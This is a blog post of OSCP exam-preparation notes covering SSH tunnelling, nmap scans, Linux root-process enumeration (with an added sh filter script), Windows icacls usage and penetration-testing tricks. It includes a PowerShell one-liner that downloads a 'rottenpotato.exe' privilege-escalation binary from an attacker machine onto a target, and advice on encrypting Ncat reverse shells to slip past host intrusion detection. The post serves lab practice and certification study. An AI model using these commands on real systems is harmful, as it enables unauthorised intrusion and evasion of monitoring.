OSCP Preparation 1: 2 Weeks In Review
OSCP officially starts for me on June 2nd, 2018. I purchased 60 days since I had to pay out of pocket and shit, that was expensive. In order to mitigate some of the inevitable head bashing I have been hitting the books hard. And by books, I really mean Hack The Box and VulnHub. My main goals are to pin down my service/version enumeration weaknesses and pick up new pre/post-exploitation techniques, primarily on Windows hosts, as that’s one of the areas I am not very competent in.
The OSCP Preparation posts will detail any tools, techniques, and different tech that I have encountered. So, here is at least two weeks of knowledge gained in one post. (I plan on doing this weekly from here on out.)
[hr]
[Linux] SSH Port Forwarding (SSH Tunneling):
There have now been a handful of times where an exploitable service/process was running on a host but only accepted connections from localhost, and exploiting it from the host itself was not efficient or effective. Instead, we need to make the connection look like it is coming from localhost when it’s really coming from my Kali box.
# Port Forward
ssh -L 1234:localhost:1234 user@192.168.1.30
SSH -L Flag MAN Page Entry:
# Port Forward SevroSecurity.com to localhost on port 443
ssh -L 443:sevrosecurity.com:443 -Nf localhost
[hr]
[Windows] Powershell Command Execution within CMD:
Having worked primarily with Linux, Windows post-exploitation enumeration is a continually steep learning curve for me. But, persistence has paid off. Here is one technique I have found useful when all you have is a cmd.exe reverse shell.
Basic Powershell Commands within CMD.exe:
# Simple Powershell Command
powershell -command ("whoami")
Download a File (Similar to Linux’s WGET):
# Download a file (Similar to Linux's WGET)
powershell -command (new-object System.Net.WebClient).DownloadFile('http://10.10.14.19:1234/rottenpotato.exe','C:\Users\Public\potato.exe')
[hr]
Service Version Enumeration:
In every box writeup that I have on the site so far, there is one constant and that’s the Nmap scan. But, I found that in a more real-world scenario constant enumeration is key. The initial Nmap scan is a great start, but the following scans are always running in the background when I first get started. Effective and efficient enumeration is key. With that said, here are my five go-to scans right away.
- Initial TCP Scan (Most Common Ports): nmap -sC -sV -oA initial-TCP <IP>
- Full TCP Scan: nmap -sC -sV -p- -v -oA Full-TCP <IP>
- Initial UDP Scan (Most Common Ports): nmap -sU -sV -oA initial-UDP <IP>
- Full UDP Scan: nmap -sU -sV -p- -oA Full-UDP <IP>
- Vulnerability Checking: nmap --script vuln -v -oA vulns <IP>
[hr]
[Linux] Post-Exploitation Process Enumeration:
One of the things we have talked about before is post-exploitation techniques, mainly for Linux. One item that I have missed, and that has proven to be very valuable, is process enumeration. Specifically, root-level processes.
ps aux | grep root
ps -ef | grep root
There have been several times where this simple enumeration has led to a successful privilege escalation on a box. If it works, it ain’t stupid!
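As an added example (not from the original post), here is a POSIX sh filter that picks out the processes whose owner is actually root from `ps -eo user,pid,ppid,cmd` output. The point it shows: `grep root` also matches any command line that merely contains "root" (a script under /root/ run by another user, for instance) and the grep itself. The sample ps listing below is constructed.

```shell
#!/bin/sh
# Added example, not from the original post: filter on the user column
# instead of grepping the whole line for "root".

# Constructed sample of `ps -eo user,pid,ppid,cmd --no-headers` output.
SAMPLE_PS='root         1     0 /sbin/init
root       412     1 /usr/sbin/cron -f
www-data   913   880 /bin/sh /root/backup.sh
mysql      970     1 /usr/sbin/mysqld
root      1021     1 /usr/bin/python /opt/monitor/agent.py
root      1040     2 [kworker/0:1]
user      2201  2100 grep root'

# root_procs: keep only lines whose first field (the user) is exactly "root",
# skipping kernel threads (command shown in [brackets]), which are not
# userland binaries you can inspect for weak permissions or writable paths.
# Note: procps truncates long user names to 8 chars plus "+"; use
# `ps -eo user:20,pid,ppid,cmd` on live systems to avoid that.
root_procs() {
    awk '$1 == "root" && $4 !~ /^\[/ { print }'
}

# naive_grep: what `ps ... | grep root` really matches, for comparison.
naive_grep() {
    grep root
}

# count_lines: number of lines on stdin, for comparing the two approaches.
count_lines() {
    awk 'END { print NR }'
}

# Run against the live process table with: sh thisfile.sh --live
if [ "${1:-}" = "--live" ]; then
    ps -eo user,pid,ppid,cmd --no-headers | root_procs
fi
```

On the constructed sample, `root_procs` returns three real root processes while the naive grep returns six lines, two of which are not root processes at all.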
[hr]
Encrypted Netcat Communications:
Okay, say you have a reverse shell but there’s a HIDS or some form of traffic signature analysis actively running on the host. One awesome way to mitigate string pattern matching is to encrypt your reverse or bind shell. First, let’s take a look at a regular reverse shell.
As you can see, we caught the Windows 10 reverse shell from Ncat and we subsequently ran “whoami”. When we analyze the data generated from this session in Wireshark, we can plainly see our data is in plaintext as seen below.
We can easily avoid this plaintext command disclosure by adding the --ssl flag to our Ncat syntax:
And we can now verify in Wireshark that our communication is in fact encrypted.
[hr]
[Windows] CACLS – iCACLS:
Like I said before, Windows is not my strong suit, yet! We OSCP-goers and professional penetration testers check for low-hanging fruit first, but for me, I don’t know the Windows fruit from a damn rabbit hole. So, a simple yet humbling discovery is how to manipulate basic file and directory permissions from a cmd.exe shell. This is where ICACLS comes in. It’s Windows’ native Access Control List binary and you need to know it.
I’m not going to do a huge write-up on ICACLS so here are some simple commands:
Check Permissions: icacls putty.exe
Force Remove: icacls putty.exe /deny admin:(F)
Then add Read + Execute: icacls putty.exe /grant:r admin:(RX)
Validate Permissions: icacls putty.exe